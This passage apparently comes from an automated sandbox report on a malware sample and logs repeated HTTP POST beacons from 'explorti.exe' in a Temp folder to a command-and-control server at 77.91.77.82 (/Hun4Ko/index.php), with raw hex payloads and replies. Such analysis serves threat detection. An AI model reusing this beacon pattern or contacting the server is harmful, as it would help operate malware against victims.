                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.64973177.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:38:41.052269936 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:38:41.744651079 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:41 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:38:41.745678902 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:38:41.967335939 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:41 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.64973277.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:38:42.085155964 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:38:42.771131039 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:42 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:38:42.772166967 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:38:42.991063118 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:42 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                10192.168.2.64973377.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:38:43.100665092 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:38:43.773608923 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:43 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:38:43.776762009 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:38:43.989880085 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:43 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                11192.168.2.64973477.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:38:44.099236012 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:38:44.791132927 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:44 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:38:44.791996956 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:38:45.006660938 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:44 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                12192.168.2.64973577.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:38:45.114963055 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:38:45.821857929 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:45 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:38:45.822844028 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:38:46.055525064 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:45 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                13192.168.2.64973677.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:38:46.177970886 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:38:46.855920076 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:46 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:38:46.856861115 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:38:47.070674896 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:46 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                14192.168.2.64973777.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:38:47.192965984 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:38:47.897663116 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:47 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:38:47.898627043 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:38:48.119134903 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:48 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                15192.168.2.64973877.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:38:48.421897888 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:38:49.116040945 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:49 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:38:49.120646954 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:38:49.336291075 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:49 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                16192.168.2.64973977.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:38:49.459661007 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:38:50.165868998 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:50 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:38:50.166752100 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:38:50.388020992 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:50 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                17192.168.2.64974077.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:38:50.506165028 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:38:51.192215919 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:51 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:38:51.193169117 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:38:51.410569906 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:51 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                18192.168.2.64974177.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:38:51.521264076 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:38:52.301347971 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:52 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:38:52.304476023 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:38:52.526424885 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:52 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                19192.168.2.64974277.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:38:52.645944118 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:38:53.354597092 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:53 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
